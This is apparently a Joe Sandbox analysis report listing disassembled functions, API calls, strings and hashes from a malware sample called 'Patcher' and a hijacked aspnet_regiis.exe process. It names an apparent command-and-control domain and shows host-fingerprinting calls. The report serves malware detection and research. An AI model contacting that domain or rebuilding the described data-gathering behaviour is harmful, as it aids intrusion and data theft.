Opcode ID: c754b0108d60862092fe04998c74c759ad6a891b2483d968ee058b803d0742bb
Instruction ID: 18df46570711b97ed7bbceba635d2bbef64ddfe2b7d463afaf273315508a9d9e
Opcode Fuzzy Hash: c754b0108d60862092fe04998c74c759ad6a891b2483d968ee058b803d0742bb
Instruction Fuzzy Hash: E351D071607202EFEF158F15D840BEB77A5EF4D328F60462AE86597AB0E731D845C7A0

Function 6CDEBD68 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6CDED11C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDEF180,?,00000000,-00000008), ref: 6CDED17D

GetLastError.KERNEL32 ref: 6CDEBDCC
__dosmaperr.LIBCMT ref: 6CDEBDD3
GetLastError.KERNEL32(?,?,?,?), ref: 6CDEBE0D
__dosmaperr.LIBCMT ref: 6CDEBE14

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 0512e2f5a9749d569ca0cda172ec6a4ac03bc401f6b063ba817fd95a7d344bf5
Instruction ID: 081cf1c8c14f7eabfdb626a8553af093de9404dd315b02838450ae14cbfe33d0
Opcode Fuzzy Hash: 0512e2f5a9749d569ca0cda172ec6a4ac03bc401f6b063ba817fd95a7d344bf5
Instruction Fuzzy Hash: 26219571604715FFDB10AF66C880DABBBADFF4D3687048519E95997AA0D730FC108BA4

Function 6CDF1066 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6CDF0818,00000000,00000001,00000000,?,?,6CDEFAD4,?,00000000,00000000), ref: 6CDF107D
GetLastError.KERNEL32(?,6CDF0818,00000000,00000001,00000000,?,?,6CDEFAD4,?,00000000,00000000,?,?,?,6CDF0079,00000000), ref: 6CDF1089

Part of subcall function 6CDF104F: CloseHandle.KERNEL32(FFFFFFFE,6CDF1099,?,6CDF0818,00000000,00000001,00000000,?,?,6CDEFAD4,?,00000000,00000000,?,?), ref: 6CDF105F

___initconout.LIBCMT ref: 6CDF1099

Part of subcall function 6CDF1011: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDF1040,6CDF0805,?,?,6CDEFAD4,?,00000000,00000000,?), ref: 6CDF1024

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6CDF0818,00000000,00000001,00000000,?,?,6CDEFAD4,?,00000000,00000000,?), ref: 6CDF10AE

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 7864d2264f144cd7837177f36173260a2b9f24109601042f46f798234164b027
Instruction ID: 413e2cd6543b584b9965e192e35a60092c357f579838427bc8097ae05eaee8cb
Opcode Fuzzy Hash: 7864d2264f144cd7837177f36173260a2b9f24109601042f46f798234164b027
Instruction Fuzzy Hash: F8F0C076640564BBCF125F95DD049897F7AFB093B5B064111FB2CD6520CB32C921EB91

Function 6CDE9763 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6CDE9788

Strings

RCC, xrefs: 6CDE97A2
MOC, xrefs: 6CDE979A

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5111a93b67da000ab84cb5274019ce715acd05181af1924178377718a27f07e3
Instruction ID: f8ed498f3203e1484495868d3685639fbf88acc26981f3eb53a2fd79ad37edaf
Opcode Fuzzy Hash: 5111a93b67da000ab84cb5274019ce715acd05181af1924178377718a27f07e3
Instruction Fuzzy Hash: FA416572901209EFCF06DF98DC80AEEBBB5BF4C308F1481A9F919A6630D3359951DB61

Function 6CE1EA80 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HCkQ, xrefs: 6CE1EBC3
PNrL, xrefs: 6CE1EABA
=CkQ, xrefs: 6CE1EB64
MJ, xrefs: 6CE1EAC6

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: =CkQ$HCkQ$MJ$PNrL
API String ID: 0-2499749531
Opcode ID: 4e5e61dc259169d4dce52f50e6e2b03d8cfed9bad837fe2faac07a4ac5acb382
Instruction ID: 40646e4c323c6437c78f12f4466b909e882400620ed470e5cbbfd785e02b4c59
Opcode Fuzzy Hash: 4e5e61dc259169d4dce52f50e6e2b03d8cfed9bad837fe2faac07a4ac5acb382
Instruction Fuzzy Hash: B5311272A1D3108BD318CF29C85174FBBE2EFC6308F19C92DE0A55B684CA7599068B86

Function 6CE21F70 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

IF, xrefs: 6CE228F0
ZK, xrefs: 6CE228FB
#C(], xrefs: 6CE227FA
.WPQ, xrefs: 6CE22812

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: #C(]$.WPQ$IF$ZK
API String ID: 0-2592460882
Opcode ID: 9b40b38338014db78875a7e5b637bdb106c268fbc49315eb31b48e0be97dbb95
Instruction ID: caa8453e64869d0488a75723cd78fd326b561d925202f678cad15f60cc532c9f
Opcode Fuzzy Hash: 9b40b38338014db78875a7e5b637bdb106c268fbc49315eb31b48e0be97dbb95
Instruction Fuzzy Hash: 584112B00183819BE3709F21E955B9BBBF4FB82758F109E1DD4C89B291D739840ACB67

Analysis Process: aspnet_regiis.exePID: 7332, Parent PID: 7260COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	22.8%
Total number of Nodes:	202
Total number of Limit Nodes:	9

Executed Functions

Function 72C7BDD0 Relevance: 27.2, APIs: 11, Strings: 4, Instructions: 904
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32( )*+,00000000,00000001,?,00000000), ref: 72C7C1ED
SysAllocString.OLEAUT32(F90FFF0C), ref: 72C7C27F
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 72C7C2BD
SysAllocString.OLEAUT32(6A84749C), ref: 72C7C32C
SysAllocString.OLEAUT32(A579AB79), ref: 72C7C403
VariantInit.OLEAUT32(?), ref: 72C7C475

Strings

)*+, xrefs: 72C7BE15
?<, xrefs: 72C7C4B3
Z[, xrefs: 72C7C396
q, xrefs: 72C7C49B

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: )*+$?<$Z[$q
API String ID: 65563702-2964544060
Opcode ID: f48cf1771c7043562d52b6903692ba75cf5557fed910cf0a769df7ca26dcf347
Instruction ID: a95220489d47d8e01f02c9a181fc98c0def1f014552a230f9dd8d84c778ffe29
Opcode Fuzzy Hash: f48cf1771c7043562d52b6903692ba75cf5557fed910cf0a769df7ca26dcf347
Instruction Fuzzy Hash: BD52ED716083418FD314CF29C88179BBBE1EFE5324F148A2DE9958B391D778D94ACB92

Function 72C657E1 Relevance: 26.6, APIs: 2, Strings: 13, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 72C6580E

Strings

0DEZ, xrefs: 72C65A33
F$\:, xrefs: 72C659F3
O(Z., xrefs: 72C659DB
c.S,, xrefs: 72C65B2F
O:B8, xrefs: 72C65B57
BN=L, xrefs: 72C65B6F
V"V , xrefs: 72C65B47
9F7D, xrefs: 72C65B7F
&@7F, xrefs: 72C65A2B
F6V4, xrefs: 72C65B5F
A^, xrefs: 72C65B8F
T0P6, xrefs: 72C65A0B
z, xrefs: 72C659AB

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: &@7F$0DEZ$9F7D$A^$BN=L$F$\:$F6V4$O(Z.$O:B8$T0P6$V"V $c.S,$z
API String ID: 237503144-1791929361
Opcode ID: 58010ade4ffbb4f1365ee64addf060a9c84999ab061947e34c0274513edf9d76
Instruction ID: b6ea6fdbe4b29fd86d50a4e32240883fbc86d75321516726b928548e51ee66ab
Opcode Fuzzy Hash: 58010ade4ffbb4f1365ee64addf060a9c84999ab061947e34c0274513edf9d76
Instruction Fuzzy Hash: BAA1CCB060C340CFD310CF99C89072BBBF1EF96368F144A2CE6968B280E7798509CB56

Function 72C48850 Relevance: 7.8, APIs: 5, Instructions: 265
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 72C48874
GetCurrentThreadId.KERNEL32 ref: 72C4887E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 72C48933
GetForegroundWindow.USER32 ref: 72C48948
ExitProcess.KERNEL32 ref: 72C48B99

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 3dfd7257c8202f62819fc37ebaca6be65c252f88386d344d7f399ee1048e1941
Instruction ID: 319d11c0538ce15569cc09389716b13af5a54488baf91bdc46a6175bef830d7c
Opcode Fuzzy Hash: 3dfd7257c8202f62819fc37ebaca6be65c252f88386d344d7f399ee1048e1941
Instruction Fuzzy Hash: 73816AB3B447140BD308EE6CCC9636BBAD69BC4314F0A963DE949D7390EA788D0987C5

Function 72C77363 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 72C773B1
GetSystemMetrics.USER32 ref: 72C773C0

Strings

, xrefs: 72C77494

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: ffa7a5bd33c74e1848df7d65fdddfa1c220f03f8f2609bb852b41cc239ccdede
Instruction ID: ef86d8f0c7b6e6aeaac2b0e407cc4678be36a8b0f669ddf244d322046e16b5ad
Opcode Fuzzy Hash: ffa7a5bd33c74e1848df7d65fdddfa1c220f03f8f2609bb852b41cc239ccdede
Instruction Fuzzy Hash: CA51A5B5D142589FDB40EFADD981A9DBBF0BB48300F10852DE498E7350E734A949CF92

Function 72C4D972 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 599
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 72C4D97A
CoUninitialize.COMBASE ref: 72C4DD1C

Strings

cureprouderio.click, xrefs: 72C4DD07, 72C4E0A9

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID: cureprouderio.click
API String ID: 3861434553-2925096321
Opcode ID: 0cc147bbae4835260eee6e499006a2a9b769570ffb55b32c7933ea8e8af8033f
Instruction ID: 0f32f011c095f31a7907f82de06f5b31f83c73e10b501efeba5b50b6d00e6c0d
Opcode Fuzzy Hash: 0cc147bbae4835260eee6e499006a2a9b769570ffb55b32c7933ea8e8af8033f
Instruction Fuzzy Hash: FE22BFB55047818FD756CF2AC4A0712BFB2BFA6304F18D68CC8864F74AD775A406CB91

Function 72C6F4A4 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 404
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 72C6F5BE

Strings

M//G, xrefs: 72C6F4B0

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: M//G
API String ID: 3960555810-2173678207
Opcode ID: 34b37ac74345e404d4fe419bf0f8290b4872bc19ff5e52ecc57790f780b7485a
Instruction ID: ce60a50dfb09c96f2764027de4f4798c9097d8f40b6f5b08443b70fe813fee89
Opcode Fuzzy Hash: 34b37ac74345e404d4fe419bf0f8290b4872bc19ff5e52ecc57790f780b7485a
Instruction Fuzzy Hash: FBD18E711047828FD715CF29C4A1766FBE1FFA6304F2885AEC4DA8B792D779A406CB50

Function 72C6E87F Relevance: 1.9, APIs: 1, Instructions: 375COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 72C6F5BE

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: 3eeb1d3ebd6fd179166a25061d9a187e8eb399b1add63d1476a58c09bbcd743c
Instruction ID: 5e064bcc6815dc6a91f6ea16bf8f57f1c5bc8890e4bebbc20e1d0c42b0a7e9a4
Opcode Fuzzy Hash: 3eeb1d3ebd6fd179166a25061d9a187e8eb399b1add63d1476a58c09bbcd743c
Instruction Fuzzy Hash: 7EC17D716047418FD715CF29C4A0766FBE2BF9A304F2886AEC4DB8B792D775A406CB50

Function 72C58664 Relevance: 1.8, APIs: 1, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8e9ca69f1d7de6af929f3d4726f05a85df8bf43b8290f4757d63af5971c979
Instruction ID: 0da2172d21731c0909c770dde5283e70ef3ab896c5a5464f2554d6bb594f0f4e
Opcode Fuzzy Hash: 0f8e9ca69f1d7de6af929f3d4726f05a85df8bf43b8290f4757d63af5971c979
Instruction Fuzzy Hash: 3491D5B15083418BC715CF2DC89179BBBE2AFE8314F288B2DE4DA87291EB34D545CB46

Function 72C80BE0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(72C84250,00000002,00000018,?,?,00000018,?,?,?), ref: 72C80C0E

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 72C7084B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,2E27282B,?), ref: 72C70A0D

Strings

+('., xrefs: 72C7094C
&sjK, xrefs: 72C70953

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID: &sjK$+('.
API String ID: 3545744682-207329785
Opcode ID: 86b1fd24fdc9d4441d0ac5137c89611837abe314f23d2c60f13df863d243e556
Instruction ID: 6f1235861b531a77cca3d3dc23432fe9886a14de0b6d862a0054e87559f0ddae
Opcode Fuzzy Hash: 86b1fd24fdc9d4441d0ac5137c89611837abe314f23d2c60f13df863d243e556
Instruction Fuzzy Hash: 18513C72650A429BE309CF29CC95762BBF2FFA5314F18865CC097C7791E778A406CB90

Function 72C6F136 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C6F1E3

Strings

%8#, xrefs: 72C6F16B
?26=, xrefs: 72C6F164

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID: %8#$?26=
API String ID: 3545744682-1344153340
Opcode ID: 9b3f50f28e480c90d82f5dcd6057f7dd1418af75d0efaca6e0044819d93d49fd
Instruction ID: 6d304119a1237eb9786f7c4542cd2333581004b9f31469d1a85e5cfa8e6921de
Opcode Fuzzy Hash: 9b3f50f28e480c90d82f5dcd6057f7dd1418af75d0efaca6e0044819d93d49fd
Instruction Fuzzy Hash: B72163705046838BE70A8F29C860762FBB5AF63354F18958DC4D79B282CB78D985CB65

Function 72C6F128 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C6F1E3

Strings

%8#, xrefs: 72C6F16B
?26=, xrefs: 72C6F164

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID: %8#$?26=
API String ID: 3545744682-1344153340
Opcode ID: 09db5e504519007e89bcd2dfc44c2302287dba16441abb240d7de144e4fbc1b0
Instruction ID: ece25aa39dd631b8e43510ebdf813b5e7ee73412c1169f6c0154bde64473a2d9
Opcode Fuzzy Hash: 09db5e504519007e89bcd2dfc44c2302287dba16441abb240d7de144e4fbc1b0
Instruction Fuzzy Hash: B31182B05046428BE309CF29CCA0762FBB5BF56354F18968DC0969B386CB38D985CBA1

Function 72C49D00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(B606B008,00000000,FO@A), ref: 72C49DDF

Strings

FO@A, xrefs: 72C49D69, 72C49DDB

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: LibraryLoad
String ID: FO@A
API String ID: 1029625771-358558723
Opcode ID: 22159bb9277931997a51ffb52416d8cd999812cd756abce897ddcde790e2693a
Instruction ID: 855e4a1af311775f20657b8e4c9f323cfb535de9509070524d656d51f8a4ee8a
Opcode Fuzzy Hash: 22159bb9277931997a51ffb52416d8cd999812cd756abce897ddcde790e2693a
Instruction Fuzzy Hash: CD1136703993A58BE314CE21C95076B7FE2AFE6700F188E5CD0C5AB741C73859068B57

Function 72C4CDD6 Relevance: 3.1, APIs: 2, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 72C4CDDA
CoInitializeEx.COMBASE(00000000,00000002), ref: 72C4CF2A

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 33292045ea916f655469d31e86d0610cb1dbffb4af0557dffd0d9b662db14bec
Instruction ID: 2bd7605f92c93836e5345f21ac382da482e247bd33be420cf10d771203a34174
Opcode Fuzzy Hash: 33292045ea916f655469d31e86d0610cb1dbffb4af0557dffd0d9b662db14bec
